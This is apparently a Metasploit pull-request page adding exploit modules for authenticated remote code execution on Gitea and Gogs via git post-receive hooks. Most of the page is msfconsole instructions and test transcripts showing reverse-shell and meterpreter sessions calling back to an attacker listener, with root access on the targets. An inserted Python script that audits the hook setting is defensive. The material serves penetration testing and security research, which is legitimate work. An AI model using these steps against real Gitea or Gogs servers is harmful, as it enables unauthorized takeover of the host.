
Gitea and Gogs Git Hooks RCE #14978

Merged: 2 commits, Apr 7, 2021

Conversation

cdelafuente-r7 (Contributor) commented:

This adds 2 exploit modules for Gitea and Gogs self-hosted Git services. I added them both to a single PR since they are very similar (Gitea is a fork of Gogs) and, if anything needs to be updated after code review, it is very likely this would have to be done for both modules identically.

Both modules leverage an insecure setting to get remote code execution on the target OS in the context of the user running the application. This is possible when the current user is allowed to create git hooks, which is the default for administrative users. For non-administrative users, the permission needs to be specifically granted by an administrator.

To achieve code execution, the module authenticates to the web interface, creates a temporary repository, sets a post-receive git hook with the payload and creates a dummy file in the repository. This last action will trigger the git hook and execute the payload. Everything is done through the web interface.

It has been mitigated in Gitea version 1.13.0 by setting the DISABLE_GIT_HOOKS configuration setting to true by default. This disables this feature and prevents all users (including admin) from creating custom git hooks. However, no mitigation has been implemented in Gogs so far (latest stable version is 0.12.3).

This has been tested successfully against Gitea Docker versions 1.12.5, 1.12.6 and 1.13.6 with DISABLE_GIT_HOOKS set to false, and on Gitea version 1.12.6 on Windows.
Also, this has been tested successfully against Gogs version 0.12.3 on Docker. The Windows version could not be tested since the git hook feature seems to be broken.

Setup

Gitea

Follow the installation steps:

Gogs

Follow the installation steps:

Verification

Gitea

  • Install the application (follow Setup)
  • Start msfconsole
  • Do: use multi/http/gitea_git_hooks_rce
  • Do: set USERNAME <username>
  • Do: set PASSWORD <password>
  • Do: set rhosts <ip>
  • Do: set rport <port>
  • Do: set lhost <ip>
  • Do: set target <target #>
  • Do: run
  • You should get a session.

Gogs

  • Install the application (follow Setup)
  • Start msfconsole
  • Do: use multi/http/gogs_git_hooks_rce
  • Do: set USERNAME <username>
  • Do: set PASSWORD <password>
  • Do: set rhosts <ip>
  • Do: set rport <port>
  • Do: set lhost <ip>
  • Do: set target <target #>
  • Do: run
  • You should get a session.
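An added defender-side audit script (not part of this PR, Metasploit, Gitea or Gogs) covering the two facts the description above states: custom git hooks run as the service user, and Gitea 1.13.0 closed the feature by defaulting DISABLE_GIT_HOOKS to true. It assumes that DISABLE_GIT_HOOKS sits in app.ini's [security] section and that a user-defined hook is stored as hooks/<event>.d/<event> beside Gitea's own hooks/<event>.d/gitea wrapper; the sample repository tree and the two app.ini fragments are constructed for the demonstration.

```python
import configparser
import os
import tempfile

HOOK_EVENTS = ("pre-receive", "update", "post-receive")

def git_hooks_disabled(app_ini_text):
    """True only if [security] DISABLE_GIT_HOOKS is explicitly true.
    Gitea < 1.13.0 defaulted it to false, so a missing key counts as weak."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False)
    cfg.read_string(app_ini_text)
    return cfg.getboolean("security", "DISABLE_GIT_HOOKS", fallback=False)

def find_custom_hooks(repos_root):
    """Non-empty custom hook scripts under every bare repo below repos_root.
    Assumption: a custom hook lives at hooks/<event>.d/<event>, beside
    Gitea's own hooks/<event>.d/gitea wrapper, which is skipped."""
    found = []
    for dirpath, dirnames, _ in os.walk(repos_root):
        if not dirpath.endswith(".git"):
            continue
        dirnames[:] = []  # bare repo reached: no need to descend into objects/
        for event in HOOK_EVENTS:
            custom = os.path.join(dirpath, "hooks", event + ".d", event)
            if os.path.isfile(custom) and os.path.getsize(custom) > 0:
                found.append(custom)
    return sorted(found)

def build_sample_tree(root):
    """Constructed sample data: two bare repos, one carrying a custom hook."""
    for repo, custom in (("space/clean.git", None),
                         ("space/hooked.git", "#!/bin/bash\necho custom\n")):
        hook_dir = os.path.join(root, repo, "hooks", "post-receive.d")
        os.makedirs(hook_dir)
        with open(os.path.join(hook_dir, "gitea"), "w") as fh:
            fh.write("#!/usr/bin/env bash\n# Gitea-managed wrapper\n")
        if custom is not None:
            with open(os.path.join(hook_dir, "post-receive"), "w") as fh:
                fh.write(custom)

WEAK_INI = "[security]\nINSTALL_LOCK = true\n"           # key absent: pre-1.13 default
HARDENED_INI = "[security]\nDISABLE_GIT_HOOKS = true\n"  # the 1.13.0+ default

def audit():
    """Both checks against the constructed sample; returns a summary dict."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        hooks = [os.path.relpath(p, root) for p in find_custom_hooks(root)]
    return {"weak_ini_disabled": git_hooks_disabled(WEAK_INI),
            "hardened_ini_disabled": git_hooks_disabled(HARDENED_INI),
            "custom_hooks": hooks}
```

On a real host, point find_custom_hooks at the gitea-repositories directory (the Windows transcript below shows one under C:\Users\space) and git_hooks_disabled at the contents of app.ini; any listed hook should be reviewed, since it executes as the Gitea service account on every push.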

Comment on lines +344 to +346
# HTTP client does not handle cookies with the same name correctly. It adds
# them instead of substituting the old value with the new one.
unless res.get_cookies.empty?

cc @agalway-r7 - might be worth checking that keep_cookies would've worked with this under #14831

space-r7 (Contributor) left a review comment:

Hey @cdelafuente-r7, these look great! I had just a few really minor suggestions.

modules/exploits/multi/http/gitea_git_hooks_rce.rb (outdated, resolved)
modules/exploits/multi/http/gogs_git_hooks_rce.rb (outdated, resolved)

space-r7 commented Apr 7, 2021

Tested the gitea module against both a Linux installation and a Windows installation:

Gitea v1.12.5 - Linux
msf6 > use exploit/multi/http/gitea_git_hooks_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhost 192.168.37.133
rhost => 192.168.37.133
msf6 exploit(multi/http/gitea_git_hooks_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rport 3000
rport => 3000
msf6 exploit(multi/http/gitea_git_hooks_rce) > set username administrator
username => administrator
msf6 exploit(multi/http/gitea_git_hooks_rce) > set password password
password => password
msf6 exploit(multi/http/gitea_git_hooks_rce) > options

Module options (exploit/multi/http/gitea_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   password         yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.37.133   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file
                                         :<path>'
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   administrator    yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gitea version is 1.12.5
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "administrator/password"
[+] Logged in
[*] Create repository "Regrant_Zathin"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Sending stage (3012516 bytes) to 192.168.37.133
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.133:38350) at 2021-04-07 11:15:26 -0500
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Cleaning up
[*] Repository Regrant_Zathin deleted.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.37.133
OS           : Ubuntu 20.04 (Linux 5.8.0-48-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.133 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/http/gitea_git_hooks_rce) > set target 0
target => 0
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gitea version is 1.12.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Authenticate with "administrator/password"
[+] Logged in
[*] Create repository "Keylex_It"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.133:38356) at 2021-04-07 11:15:37 -0500
[*] Cleaning up
[*] Repository Keylex_It deleted.

whoami
root
uname -a
Linux ubuntu 5.8.0-48-generic #54~20.04.1-Ubuntu SMP Sat Mar 20 13:40:25 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y
Gitea v1.12.2 - Windows
msf6 exploit(multi/http/gitea_git_hooks_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix Command
   1   Linux Dropper
   2   Windows Command
   3   Windows Dropper


msf6 exploit(multi/http/gitea_git_hooks_rce) > set target 2
target => 2
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhost 192.168.37.132
rhost => 192.168.37.132
msf6 exploit(multi/http/gitea_git_hooks_rce) > set username space
username => space
msf6 exploit(multi/http/gitea_git_hooks_rce) > set password P@ssword1
password => P@ssword1
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[*] Started reverse SSL handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gitea version is 1.12.2
[*] Executing Windows Command for cmd/windows/powershell_reverse_tcp
[*] Authenticate with "space/P@ssword1"
[+] Logged in
[*] Create repository "Kanlam_Ventosanzap"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Powershell session session 3 opened (192.168.37.1:4444 -> 192.168.37.132:51254) at 2021-04-07 11:17:47 -0500
[*] Cleaning up
[*] Repository Kanlam_Ventosanzap deleted.

Windows PowerShell running as user space on DESKTOP-LFGB301
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\space\gitea-repositories\space\kanlam_ventosanzap.git>whoami
space
PS C:\Users\space\gitea-repositories\space\kanlam_ventosanzap.git> ^C
Abort session 3? [y/N]  y

[*] 192.168.37.132 - Powershell session session 3 closed.  Reason: User exit
msf6 exploit(multi/http/gitea_git_hooks_rce) > set target 3
target => 3
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gitea version is 1.12.2
[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
[*] Authenticate with "space/P@ssword1"
[+] Logged in
[*] Create repository "Y-Solowarm_Alpha"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created
[*] Command Stager progress -  20.14% done (2046/10161 bytes)
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created
[*] Command Stager progress -  40.27% done (4092/10161 bytes)
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created
[*] Command Stager progress -  60.41% done (6138/10161 bytes)
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created
[*] Command Stager progress -  80.54% done (8184/10161 bytes)
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Command Stager progress - 100.00% done (10161/10161 bytes)
[*] Sending stage (200262 bytes) to 192.168.37.132
[*] Meterpreter session 4 opened (192.168.37.1:4444 -> 192.168.37.132:51265) at 2021-04-07 11:19:14 -0500
[*] Cleaning up
[*] Repository Y-Solowarm_Alpha deleted.

meterpreter > getuid
Server username: DESKTOP-LFGB301\space
meterpreter > sysinfo
Computer        : DESKTOP-LFGB301
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Only tested the latest version of Gogs on Linux:

Gogs v0.12.3 - Linux
msf6 > use exploit/multi/http/gogs_git_hooks_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gogs_git_hooks_rce) > set rhost 192.168.37.133
rhost => 192.168.37.133
msf6 exploit(multi/http/gogs_git_hooks_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/gogs_git_hooks_rce) > set rport 3000
rport => 3000
msf6 exploit(multi/http/gogs_git_hooks_rce) > set username space
username => space
msf6 exploit(multi/http/gogs_git_hooks_rce) > set password P@ssword1
password => P@ssword1
msf6 exploit(multi/http/gogs_git_hooks_rce) > options

Module options (exploit/multi/http/gogs_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   P@ssword1        yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.37.133   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file
                                         :<path>'
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   space            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gogs_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gogs found
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "space/P@ssword1"
[+] Logged in
[*] Create repository "Quo_Lux_Transcof"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Sending stage (3012516 bytes) to 192.168.37.133
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.133:35238) at 2021-04-07 11:53:03 -0500
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Cleaning up
[*] Repository Quo_Lux_Transcof deleted.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.37.133
OS           : Ubuntu 20.04 (Linux 5.8.0-48-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.133 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/http/gogs_git_hooks_rce) > set target 0
target => 0
msf6 exploit(multi/http/gogs_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gogs found
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Authenticate with "space/P@ssword1"
[+] Logged in
[*] Create repository "Greenlam_Sonair"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.133:35242) at 2021-04-07 11:53:48 -0500
[*] Cleaning up
[*] Repository Greenlam_Sonair deleted.

whoami
root
uname -a
Linux ubuntu 5.8.0-48-generic #54~20.04.1-Ubuntu SMP Sat Mar 20 13:40:25 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y

- Set RPORT default value to 3000
- Use ternary operator
cdelafuente-r7 (Contributor, Author) commented:

Thanks for reviewing and testing this @space-r7! I believe I addressed all the comments in the last commit. Please let me know if there is anything else that should be updated.


space-r7 commented Apr 7, 2021

Looks good to me! Thanks much!

@space-r7 space-r7 merged commit 926f051 into rapid7:master Apr 7, 2021

space-r7 commented Apr 7, 2021

Original Release Notes

This adds two modules, exploit/multi/http/gitea_git_hooks_rce and exploit/multi/http/gogs_git_hooks_rce, that both leverage a git hooks setting to achieve authenticated remote code execution against vulnerable versions of Gitea and Gogs respectively. With valid credentials and the permission to create git hooks, both modules create a repo and upload a payload as a post-receive hook. Upon creating an additional file in the repo, the post-receive hook will be triggered, which will grant code execution as the user running the software.

space-r7 added the rn-modules label (release notes for new or majorly enhanced modules) Apr 7, 2021
pbarry-r7 (Contributor) commented:

Release Notes

New module exploit/multi/http/gogs_git_hooks_rce leverages a git hooks setting to achieve authenticated remote code execution against vulnerable versions of Gogs (self-hosted Git service). With valid credentials and the permission to create git hooks, this module creates a repo and uploads a payload as a post-receive hook. Upon creating an additional file in the repo, the post-receive hook will be triggered, which will grant code execution as the user running the software.

New module exploit/multi/http/gitea_git_hooks_rce leverages a git hooks setting to achieve authenticated remote code execution against vulnerable versions of Gitea (self-hosted Git service). With valid credentials and the permission to create git hooks, this module creates a repo and uploads a payload as a post-receive hook. Upon creating an additional file in the repo, the post-receive hook will be triggered, which will grant code execution as the user running the software.
